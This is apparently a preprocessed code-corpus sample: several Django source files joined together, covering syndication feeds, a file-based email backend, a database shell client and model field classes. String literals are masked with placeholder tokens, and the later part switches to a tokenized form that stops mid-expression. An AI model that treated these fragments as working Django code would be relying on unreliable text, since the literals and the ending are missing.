            author_link=self.__get_dynamic_attr('<STR_LIT>', obj),
            author_email=self.__get_dynamic_attr('<STR_LIT>', obj),
            categories=self.__get_dynamic_attr('<STR_LIT>', obj),
            feed_copyright=self.__get_dynamic_attr('<STR_LIT>', obj),
            feed_guid=self.__get_dynamic_attr('<STR_LIT>', obj),
            ttl=self.__get_dynamic_attr('<STR_LIT>', obj),
            **self.feed_extra_kwargs(obj)
        )
        # Templates are optional: a missing template silently falls back to
        # the dynamic item_* attributes below.
        title_tmp = None
        if self.title_template is not None:
            try:
                title_tmp = loader.get_template(self.title_template)
            except TemplateDoesNotExist:
                pass
        description_tmp = None
        if self.description_template is not None:
            try:
                description_tmp = loader.get_template(self.description_template)
            except TemplateDoesNotExist:
                pass
        for item in self.__get_dynamic_attr('<STR_LIT>', obj):
            if title_tmp is not None:
                title = title_tmp.render(RequestContext(request, {'<STR_LIT>': item, '<STR_LIT>': current_site}))
            else:
                title = self.__get_dynamic_attr('<STR_LIT>', item)
            if description_tmp is not None:
                description = description_tmp.render(RequestContext(request, {'<STR_LIT>': item, '<STR_LIT>': current_site}))
            else:
                description = self.__get_dynamic_attr('<STR_LIT>', item)
            link = add_domain(
                current_site.domain,
                self.__get_dynamic_attr('<STR_LIT>', item),
                request.is_secure(),
            )
            enc = None
            enc_url = self.__get_dynamic_attr('<STR_LIT>', item)
            if enc_url:
                enc = feedgenerator.Enclosure(
                    url=smart_unicode(enc_url),
                    length=smart_unicode(self.__get_dynamic_attr('<STR_LIT>', item)),
                    mime_type=smart_unicode(self.__get_dynamic_attr('<STR_LIT>', item))
                )
            author_name = self.__get_dynamic_attr('<STR_LIT>', item)
            if author_name is not None:
                author_email = self.__get_dynamic_attr('<STR_LIT>', item)
                author_link = self.__get_dynamic_attr('<STR_LIT>', item)
            else:
                author_email = author_link = None
            pubdate = self.__get_dynamic_attr('<STR_LIT>', item)
            if pubdate and not pubdate.tzinfo:
                # Naive datetimes are assumed to be in local time.
                ltz = tzinfo.LocalTimezone(pubdate)
                pubdate = pubdate.replace(tzinfo=ltz)
            feed.add_item(
                title=title,
                link=link,
                description=description,
                unique_id=self.__get_dynamic_attr('<STR_LIT>', item, link),
                enclosure=enc,
                pubdate=pubdate,
                author_name=author_name,
                author_email=author_email,
                author_link=author_link,
                categories=self.__get_dynamic_attr('<STR_LIT>', item),
                item_copyright=self.__get_dynamic_attr('<STR_LIT>', item),
                **self.item_extra_kwargs(item)
            )
        return feed


def feed(request, url, feed_dict=None):
    """Deprecated function-based feed view: dispatch *url* ('slug/param') to a
    feed class in *feed_dict*, supporting both legacy and new-style feeds."""
    from django.contrib.syndication.feeds import Feed as LegacyFeed
    import warnings
    warnings.warn('<STR_LIT>'
                  '<STR_LIT>',
                  category=PendingDeprecationWarning)
    if not feed_dict:
        raise Http404("<STR_LIT>")
    try:
        slug, param = url.split('<STR_LIT:/>', 1)
    except ValueError:
        slug, param = url, '<STR_LIT>'
    try:
        f = feed_dict[slug]
    except KeyError:
        raise Http404("<STR_LIT>" % slug)
    if not issubclass(f, LegacyFeed):
        # New-style class-based feed: instantiate and delegate to __call__.
        instance = f()
        instance.feed_url = getattr(f, '<STR_LIT>', None) or request.path
        instance.title_template = f.title_template or ('<STR_LIT>' % slug)
        instance.description_template = f.description_template or ('<STR_LIT>' % slug)
        return instance(request)
    try:
        feedgen = f(slug, request).get_feed(param)
    except FeedDoesNotExist:
        raise Http404("<STR_LIT>" % slug)
    response = HttpResponse(mimetype=feedgen.mime_type)
    feedgen.write(response, '<STR_LIT:utf-8>')
    return response
"""Email backend that writes each message batch to a file on disk."""
import datetime
import os

from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.console import EmailBackend as ConsoleEmailBackend


class EmailBackend(ConsoleEmailBackend):
    def __init__(self, *args, **kwargs):
        # Lazily computed target filename (see _get_filename).
        self._fname = None
        # file_path comes from the kwarg if given, else from settings.
        if '<STR_LIT>' in kwargs:
            self.file_path = kwargs.pop('<STR_LIT>')
        else:
            self.file_path = getattr(settings, '<STR_LIT>', None)
        if not isinstance(self.file_path, basestring):
            raise ImproperlyConfigured('<STR_LIT>' % self.file_path)
        self.file_path = os.path.abspath(self.file_path)
        # Validation order matters: existing-non-dir, then create-if-missing,
        # then writability of the resulting directory.
        if os.path.exists(self.file_path) and not os.path.isdir(self.file_path):
            raise ImproperlyConfigured('<STR_LIT>' % self.file_path)
        elif not os.path.exists(self.file_path):
            try:
                os.makedirs(self.file_path)
            except OSError, err:
                raise ImproperlyConfigured('<STR_LIT>' % (self.file_path, err))
        if not os.access(self.file_path, os.W_OK):
            raise ImproperlyConfigured('<STR_LIT>' % self.file_path)
        # Force the inherited console backend's stream kwarg to None; the
        # stream is opened on demand in open().
        kwargs['<STR_LIT>'] = None
        super(EmailBackend, self).__init__(*args, **kwargs)

    def _get_filename(self):
        """Return (creating once) the unique output filename for this backend
        instance, derived from a timestamp and the instance id."""
        if self._fname is None:
            timestamp = datetime.datetime.now().strftime("<STR_LIT>")
            fname = "<STR_LIT>" % (timestamp, abs(id(self)))
            self._fname = os.path.join(self.file_path, fname)
        return self._fname

    def open(self):
        # Returns True only when this call actually opened the stream
        # (append mode), mirroring the base backend's open() contract.
        if self.stream is None:
            self.stream = open(self._get_filename(), '<STR_LIT:a>')
            return True
        return False

    def close(self):
        # Always reset self.stream, even if close() raises.
        try:
            if self.stream is not None:
                self.stream.close()
        finally:
            self.stream = None
from django.core.management.base import AppCommand, CommandError


class Command(AppCommand):
    # Stub management command: handle() unconditionally raises CommandError,
    # so running it only surfaces the error message below.
    help = "<STR_LIT>"

    def handle(self, *apps, **options):
        raise CommandError("<STR_LIT>")
import os
import sys

from django.db.backends import BaseDatabaseClient


class DatabaseClient(BaseDatabaseClient):
    """Launches the interactive command-line client for this DB connection."""

    executable_name = '<STR_LIT>'

    def runshell(self):
        conf = self.connection.settings_dict
        opts = conf['<STR_LIT>']
        # Per-option overrides fall back to the top-level settings values.
        database = opts.get('<STR_LIT>', conf['<STR_LIT>'])
        user = opts.get('<STR_LIT:user>', conf['<STR_LIT>'])
        passwd = opts.get('<STR_LIT>', conf['<STR_LIT>'])
        host = opts.get('<STR_LIT:host>', conf['<STR_LIT>'])
        port = opts.get('<STR_LIT:port>', conf['<STR_LIT>'])
        defaults_file = opts.get('<STR_LIT>')

        cmd = [self.executable_name]
        if defaults_file:
            cmd.append("<STR_LIT>" % defaults_file)
        if user:
            cmd.append("<STR_LIT>" % user)
        if passwd:
            cmd.append("<STR_LIT>" % passwd)
        if host:
            # A path-like host selects the socket form of the flag.
            if '<STR_LIT:/>' in host:
                cmd.append("<STR_LIT>" % host)
            else:
                cmd.append("<STR_LIT>" % host)
        if port:
            cmd.append("<STR_LIT>" % port)
        if database:
            cmd.append(database)

        if os.name == '<STR_LIT>':
            # Run via the shell and propagate its exit status.
            sys.exit(os.system("<STR_LIT:U+0020>".join(cmd)))
        else:
            # Replace the current process with the client.
            os.execvp(self.executable_name, cmd)
import datetime
import decimal
import re
import time
import math
from itertools import tee

import django.utils.copycompat as copy

from django.db import connection
from django.db.models.fields.subclassing import LegacyConnection
from django.db.models.query_utils import QueryWrapper
from django.conf import settings
from django import forms
from django.core import exceptions, validators
from django.utils.datastructures import DictWrapper
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode, force_unicode, smart_str
from django.utils import datetime_safe


class NOT_PROVIDED:
    # Sentinel class distinguishing "no default supplied" from default=None.
    pass

# Default blank-choice entries prepended to choice lists.
BLANK_CHOICE_DASH = [("<STR_LIT>", "<STR_LIT>")]
BLANK_CHOICE_NONE = [("<STR_LIT>", "<STR_LIT:None>")]


class FieldDoesNotExist(Exception):
    pass


class Field(object):
    """Base class for all model field types."""
    __metaclass__ = LegacyConnection

    empty_strings_allowed = True
    # Class-level counters give fields a deterministic definition order;
    # auto-created fields count downward from -1.
    creation_counter = 0
    auto_creation_counter = -1
    default_validators = []
    default_error_messages = {
        '<STR_LIT>': _(u'<STR_LIT>'),
        '<STR_LIT:null>': _(u'<STR_LIT>'),
        '<STR_LIT:blank>': _(u'<STR_LIT>'),
    }

    def _description(self):
        return _(u'<STR_LIT>') % {
            '<STR_LIT>': self.__class__.__name__
        }
    description = property(_description)

    def __init__(self, verbose_name=None, name=None, primary_key=False,
            max_length=None, unique=False, blank=False, null=False,
            db_index=False, rel=None, default=NOT_PROVIDED, editable=True,
            serialize=True, unique_for_date=None, unique_for_month=None,
            unique_for_year=None, choices=None, help_text='<STR_LIT>', db_column=None,
            db_tablespace=None, auto_created=False, validators=[],
            error_messages=None):
        self.name = name
        self.verbose_name = verbose_name
        self.primary_key = primary_key
        self.max_length, self._unique = max_length, unique
        self.blank, self.null = blank, null
        # Backends that store empty strings as NULL force null=True here.
        if self.empty_strings_allowed and connection.features.interprets_empty_strings_as_nulls:
            self.null = True
        self.rel = rel
        self.default = default
        self.editable = editable
        self.serialize = serialize
        self.unique_for_date, self.unique_for_month = unique_for_date, unique_for_month
        self.unique_for_year = unique_for_year
        self._choices = choices or []
        self.help_text = help_text
        self.db_column = db_column
        self.db_tablespace = db_tablespace or settings.DEFAULT_INDEX_TABLESPACE
        self.auto_created = auto_created
        self.db_index = db_index
        if auto_created:
            self.creation_counter = Field.auto_creation_counter
            Field.auto_creation_counter -= 1
        else:
            self.creation_counter = Field.creation_counter
            Field.creation_counter += 1
        self.validators = self.default_validators + validators
        # Merge error messages down the MRO so subclasses override bases,
        # and instance-supplied messages override everything.
        messages = {}
        for c in reversed(self.__class__.__mro__):
            messages.update(getattr(c, '<STR_LIT>', {}))
        messages.update(error_messages or {})
        self.error_messages = messages

    def __cmp__(self, other):
        # Fields sort by definition order.
        return cmp(self.creation_counter, other.creation_counter)

    def __deepcopy__(self, memodict):
        # Shallow-copy self and its rel; deep copies aren't needed here.
        obj = copy.copy(self)
        if self.rel:
            obj.rel = copy.copy(self.rel)
        memodict[id(self)] = obj
        return obj

    def to_python(self, value):
        """Convert *value* to the correct Python type; base impl is identity."""
        return value

    def run_validators(self, value):
        if value in validators.EMPTY_VALUES:
            return
        errors = []
        for v in self.validators:
            try:
                v(value)
            except exceptions.ValidationError, e:
                # Prefer this field's message for the validator's error code.
                if hasattr(e, '<STR_LIT:code>') and e.code in self.error_messages:
                    message = self.error_messages[e.code]
                    if e.params:
                        message = message % e.params
                    errors.append(message)
                else:
                    errors.extend(e.messages)
        if errors:
            raise exceptions.ValidationError(errors)

    def validate(self, value, model_instance):
        """Validate value against choices, null and blank constraints."""
        if not self.editable:
            return
        if self._choices and value:
            # Choices may contain optgroups (nested (key, value) lists).
            for option_key, option_value in self.choices:
                if isinstance(option_value, (list, tuple)):
                    for optgroup_key, optgroup_value in option_value:
                        if value == optgroup_key:
                            return
                elif value == option_key:
                    return
            raise exceptions.ValidationError(self.error_messages['<STR_LIT>'] % value)
        if value is None and not self.null:
            raise exceptions.ValidationError(self.error_messages['<STR_LIT:null>'])
        if not self.blank and value in validators.EMPTY_VALUES:
            raise exceptions.ValidationError(self.error_messages['<STR_LIT:blank>'])

    def clean(self, value, model_instance):
        """Convert, validate and run validators; return the cleaned value."""
        value = self.to_python(value)
        self.validate(value, model_instance)
        self.run_validators(value)
        return value

    def db_type(self, connection):
        """Return the backend column type for this field, or None if unknown."""
        data = DictWrapper(self.__dict__, connection.ops.quote_name, "<STR_LIT>")
        try:
            return connection.creation.data_types[self.get_internal_type()] % data
        except KeyError:
            return None

    def unique(self):
        return self._unique or self.primary_key
    unique = property(unique)

    def set_attributes_from_name(self, name):
        self.name = name
        self.attname, self.column = self.get_attname_column()
        if self.verbose_name is None and name:
            self.verbose_name = name.replace('<STR_LIT:_>', '<STR_LIT:U+0020>')

    def contribute_to_class(self, cls, name):
        # Register on the model's _meta and expose get_FOO_display for choices.
        self.set_attributes_from_name(name)
        self.model = cls
        cls._meta.add_field(self)
        if self.choices:
            setattr(cls, '<STR_LIT>' % self.name, curry(cls._get_FIELD_display, field=self))

    def get_attname(self):
        return self.name

    def get_attname_column(self):
        attname = self.get_attname()
        column = self.db_column or attname
        return attname, column

    def get_cache_name(self):
        return '<STR_LIT>' % self.name

    def get_internal_type(self):
        return self.__class__.__name__

    def pre_save(self, model_instance, add):
        """Return the value of this field just before saving."""
        return getattr(model_instance, self.attname)

    def get_prep_value(self, value):
        """First (backend-independent) step of value preparation."""
        return value

    def get_db_prep_value(self, value, connection, prepared=False):
        """Backend-specific value preparation; runs get_prep_value first."""
        if not prepared:
            value = self.get_prep_value(value)
        return value

    def get_db_prep_save(self, value, connection):
        """Prepare a value for saving to the database."""
        return self.get_db_prep_value(value, connection=connection, prepared=False)

    def get_prep_lookup(self, lookup_type, value):
        """Backend-independent preparation of a lookup value."""
        # Objects exposing their own prepare hooks win.
        if hasattr(value, '<STR_LIT>'):
            return value.prepare()
        if hasattr(value, '<STR_LIT>'):
            return value._prepare()
        if lookup_type in (
                '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'
            ):
            return value
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'):
            return self.get_prep_value(value)
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>'):
            return [self.get_prep_value(v) for v in value]
        elif lookup_type == '<STR_LIT>':
            try:
                return int(value)
            except ValueError:
                raise ValueError("<STR_LIT>")
        raise TypeError("<STR_LIT>" % lookup_type)

    def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
        """Backend-specific preparation of a lookup value; returns a list of
        SQL parameters (or a QueryWrapper for subquery-like values)."""
        if not prepared:
            value = self.get_prep_lookup(lookup_type, value)
        if hasattr(value, '<STR_LIT>'):
            value = value.get_compiler(connection=connection)
        if hasattr(value, '<STR_LIT>') or hasattr(value, '<STR_LIT>'):
            # Value is query-like: wrap its SQL instead of treating as a literal.
            if hasattr(value, '<STR_LIT>'):
                return value
            if hasattr(value, '<STR_LIT>'):
                sql, params = value.as_sql()
            else:
                sql, params = value._as_sql(connection=connection)
            return QueryWrapper(('<STR_LIT>' % sql), params)
        if lookup_type in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'):
            return [value]
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'):
            return [self.get_db_prep_value(value, connection=connection, prepared=prepared)]
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>'):
            return [self.get_db_prep_value(v, connection=connection, prepared=prepared) for v in value]
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>'):
            return ["<STR_LIT>" % connection.ops.prep_for_like_query(value)]
        elif lookup_type == '<STR_LIT>':
            return [connection.ops.prep_for_iexact_query(value)]
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>'):
            return ["<STR_LIT>" % connection.ops.prep_for_like_query(value)]
        elif lookup_type in ('<STR_LIT>', '<STR_LIT>'):
            return ["<STR_LIT>" % connection.ops.prep_for_like_query(value)]
        elif lookup_type == '<STR_LIT>':
            return []
        elif lookup_type == '<STR_LIT>':
            if self.get_internal_type() == '<STR_LIT>':
                return connection.ops.year_lookup_bounds_for_date_field(value)
            else:
                return connection.ops.year_lookup_bounds(value)

    def has_default(self):
        """True when an explicit default was supplied (NOT_PROVIDED sentinel)."""
        return self.default is not NOT_PROVIDED

    def get_default(self):
        """Return the field's default value, calling it if callable."""
        if self.has_default():
            if callable(self.default):
                return self.default()
            return force_unicode(self.default, strings_only=True)
        if not self.empty_strings_allowed or (self.null and not connection.features.interprets_empty_strings_as_nulls):
            return None
        return "<STR_LIT>"

    def get_validator_unique_lookup_type(self):
        return '<STR_LIT>' % self.name

    def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH):
        """Return choice tuples, optionally prefixed with a blank choice;
        relation fields derive choices from the related model's objects."""
        first_choice = include_blank and blank_choice or []
        if self.choices:
            return first_choice + list(self.choices)
        rel_model = self.rel.to
        if hasattr(self.rel, '<STR_LIT>'):
            lst = [(getattr(x, self.rel.get_related_field().attname), smart_unicode(x)) for x in rel_model._default_manager.complex_filter(self.rel.limit_choices_to)]
        else:
            lst = [(x._get_pk_val(), smart_unicode(x)) for x in rel_model._default_manager.complex_filter(self.rel.limit_choices_to)]
        return first_choice + lst

    def get_choices_default(self):
        return self.get_choices()

    def get_flatchoices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH):
        """Flattened choices (optgroups expanded), optionally with a blank entry."""
        first_choice = include_blank and blank_choice or []
        return first_choice + list(self.flatchoices)

    def _get_val_from_obj(self, obj):
        if obj is not None:
            return getattr(obj, self.attname)
        else:
            return self.get_default()

    def value_to_string(self, obj):
        """Serialize this field's value on *obj* to a unicode string."""
        return smart_unicode(self._get_val_from_obj(obj))

    def bind(self, fieldmapping, original, bound_field_class):
        return bound_field_class(self, fieldmapping, original)

    def _get_choices(self):
        # Iterator-backed choices are duplicated with tee so they can be
        # consumed more than once.
        if hasattr(self._choices, '<STR_LIT>'):
            choices, self._choices = tee(self._choices)
            return choices
        else:
            return self._choices
    choices = property(_get_choices)

    def _get_flatchoices(self):
        """Flatten optgroup (nested) choices into a single (key, value) list."""
        flat = []
        for choice, value in self.choices:
            if isinstance(value, (list, tuple)):
                flat.extend(value)
            else:
                flat.append((choice, value))
        return flat
    flatchoices = property(_get_flatchoices)

    def save_form_data(self, instance, data):
        setattr(instance, self.name, data)

    def formfield(self, form_class=forms.CharField, **kwargs):
        """Return a django.forms field configured from this model field."""
        defaults = {'<STR_LIT>': not self.blank, '<STR_LIT:label>': capfirst(self.verbose_name), '<STR_LIT>': self.help_text}
        if self.has_default():
            if callable(self.default):
                defaults['<STR_LIT>'] = self.default
                defaults['<STR_LIT>'] = True
            else:
                defaults['<STR_LIT>'] = self.get_default()
        if self.choices:
            include_blank = self.blank or not (self.has_default() or '<STR_LIT>' in kwargs)
            defaults['<STR_LIT>'] = self.get_choices(include_blank=include_blank)
            defaults['<STR_LIT>'] = self.to_python
            if self.null:
                defaults['<STR_LIT>'] = None
            form_class = forms.TypedChoiceField
            # With choices, only a whitelisted subset of kwargs makes sense
            # for TypedChoiceField; drop everything else.
            for k in kwargs.keys():
                if k not in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                             '<STR_LIT>', '<STR_LIT:label>', '<STR_LIT>', '<STR_LIT>',
                             '<STR_LIT>', '<STR_LIT>'):
                    del kwargs[k]
        defaults.update(kwargs)
        return form_class(**defaults)

    def value_from_object(self, obj):
        """Return this field's value from the given model instance."""
        return getattr(obj, self.attname)


class AutoField(Field):
    description = _("<STR_LIT>")
    empty_strings_allowed = False
    default_error_messages = {
        '<STR_LIT>': _(u'<STR_LIT>'),
    }

    def __init__(self, *args, **kwargs):
        # An AutoField only makes sense as the primary key.
        assert kwargs.get('<STR_LIT:primary_key>', False) is True, "<STR_LIT>" % self.__class__.__name__
        kwargs['<STR_LIT:blank>'] = True
        Field.__init__(self, *args, **kwargs)

    def get_internal_type(self):
        return "<STR_LIT>"

    def to_python(self, value):
        if value is None:
            return value
        try:
            return int(value)
        except (TypeError, ValueError):
            raise exceptions.ValidationError(self.error_messages['<STR_LIT>'])

    def validate(self, value, model_instance):
        # Auto-assigned, so nothing to validate.
        pass

    def get_prep_value(self, value):
        if value is None:
            return None
        return int(value)

    def contribute_to_class(self, cls, name):
        # A model may have at most one AutoField.
        assert not cls._meta.has_auto_field, "<STR_LIT>"
        super(AutoField, self).contribute_to_class(cls, name)
        cls._meta.has_auto_field = True
        cls._meta.auto_field = self

    def formfield(self, **kwargs):
        # Never exposed on forms.
        return None


class BooleanField(Field):
    empty_strings_allowed = False
    default_error_messages = {
        '<STR_LIT>': _(u'<STR_LIT>'),
    }
    description = _("<STR_LIT>")

    def __init__(self, *args, **kwargs):
        kwargs['<STR_LIT:blank>'] = True
        # Non-null booleans default to False unless a default was given.
        if '<STR_LIT:default>' not in kwargs and not kwargs.get('<STR_LIT:null>'):
            kwargs['<STR_LIT:default>'] = False
        Field.__init__(self, *args, **kwargs)

    def get_internal_type(self):
        return "<STR_LIT>"

    def to_python(self, value):
        if value in (True, False):
            return bool(value)
        if value in ('<STR_LIT:t>', '<STR_LIT:True>', '<STR_LIT:1>'):
            return True
        if value in ('<STR_LIT:f>', '<STR_LIT:False>', '<STR_LIT:0>'):
            return False
        raise exceptions.ValidationError(self.error_messages['<STR_LIT>'])

    def get_prep_lookup(self, lookup_type, value):
        # Normalize '1'/'0' strings to real booleans before lookup prep.
        if value in ('<STR_LIT:1>', '<STR_LIT:0>'):
            value = bool(int(value))
        return super(BooleanField, self).get_prep_lookup(lookup_type, value)

    def get_prep_value(self, value):
        if value is None:
            return None
        return bool(value)

    def formfield(self, **kwargs):
        if self.choices:
            include_blank = self.null or not (self.has_default() or '<STR_LIT>' in kwargs)
            defaults = {'<STR_LIT>': self.
get_choices ( include_blank = include_blank ) } <EOL> else : <EOL> defaults = { '<STR_LIT>' : forms . BooleanField } <EOL> defaults . update ( kwargs ) <EOL> return super ( BooleanField , self ) . formfield ( ** defaults ) <EOL> class CharField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CharField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . validators . append ( validators . MaxLengthValidator ( self . max_length ) ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if isinstance ( value , basestring ) or value is None : <EOL> return value <EOL> return smart_unicode ( value ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT:max_length>' : self . max_length } <EOL> defaults . update ( kwargs ) <EOL> return super ( CharField , self ) . formfield ( ** defaults ) <EOL> class CommaSeparatedIntegerField ( CharField ) : <EOL> default_validators = [ validators . validate_comma_separated_integer_list ] <EOL> description = _ ( "<STR_LIT>" ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( CommaSeparatedIntegerField , self ) . formfield ( ** defaults ) <EOL> ansi_date_re = re . compile ( r'<STR_LIT>' ) <EOL> class DateField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , verbose_name = None , name = None , auto_now = False , auto_now_add = False , ** kwargs ) : <EOL> self . auto_now , self . 
auto_now_add = auto_now , auto_now_add <EOL> if auto_now or auto_now_add : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value . date ( ) <EOL> if isinstance ( value , datetime . date ) : <EOL> return value <EOL> if not ansi_date_re . search ( value ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> year , month , day = map ( int , value . split ( '<STR_LIT:->' ) ) <EOL> try : <EOL> return datetime . date ( year , month , day ) <EOL> except ValueError , e : <EOL> msg = self . error_messages [ '<STR_LIT>' ] % _ ( str ( e ) ) <EOL> raise exceptions . ValidationError ( msg ) <EOL> def pre_save ( self , model_instance , add ) : <EOL> if self . auto_now or ( self . auto_now_add and add ) : <EOL> value = datetime . date . today ( ) <EOL> setattr ( model_instance , self . attname , value ) <EOL> return value <EOL> else : <EOL> return super ( DateField , self ) . pre_save ( model_instance , add ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> super ( DateField , self ) . contribute_to_class ( cls , name ) <EOL> if not self . null : <EOL> setattr ( cls , '<STR_LIT>' % self . name , <EOL> curry ( cls . _get_next_or_previous_by_FIELD , field = self , is_next = True ) ) <EOL> setattr ( cls , '<STR_LIT>' % self . name , <EOL> curry ( cls . _get_next_or_previous_by_FIELD , field = self , is_next = False ) ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if lookup_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return int ( value ) <EOL> return super ( DateField , self ) . get_prep_lookup ( lookup_type , value ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . 
to_python ( value ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return connection . ops . value_to_db_date ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> val = self . _get_val_from_obj ( obj ) <EOL> if val is None : <EOL> data = '<STR_LIT>' <EOL> else : <EOL> data = datetime_safe . new_date ( val ) . strftime ( "<STR_LIT>" ) <EOL> return data <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . DateField } <EOL> defaults . update ( kwargs ) <EOL> return super ( DateField , self ) . formfield ( ** defaults ) <EOL> class DateTimeField ( DateField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value <EOL> if isinstance ( value , datetime . date ) : <EOL> return datetime . datetime ( value . year , value . month , value . day ) <EOL> value = smart_str ( value ) <EOL> if '<STR_LIT:.>' in value : <EOL> try : <EOL> value , usecs = value . split ( '<STR_LIT:.>' ) <EOL> usecs = int ( usecs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> else : <EOL> usecs = <NUM_LIT:0> <EOL> kwargs = { '<STR_LIT>' : usecs } <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , '<STR_LIT>' ) [ : <NUM_LIT:6> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , '<STR_LIT>' ) [ : <NUM_LIT:5> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> try : <EOL> return datetime . datetime ( * time . 
strptime ( value , '<STR_LIT>' ) [ : <NUM_LIT:3> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def pre_save ( self , model_instance , add ) : <EOL> if self . auto_now or ( self . auto_now_add and add ) : <EOL> value = datetime . datetime . now ( ) <EOL> setattr ( model_instance , self . attname , value ) <EOL> return value <EOL> else : <EOL> return super ( DateTimeField , self ) . pre_save ( model_instance , add ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return connection . ops . value_to_db_datetime ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> val = self . _get_val_from_obj ( obj ) <EOL> if val is None : <EOL> data = '<STR_LIT>' <EOL> else : <EOL> d = datetime_safe . new_datetime ( val ) <EOL> data = d . strftime ( '<STR_LIT>' ) <EOL> return data <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . DateTimeField } <EOL> defaults . update ( kwargs ) <EOL> return super ( DateTimeField , self ) . formfield ( ** defaults ) <EOL> class DecimalField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , max_digits = None , decimal_places = None , ** kwargs ) : <EOL> self . max_digits , self . decimal_places = max_digits , decimal_places <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return decimal . Decimal ( value ) <EOL> except decimal . InvalidOperation : <EOL> raise exceptions . 
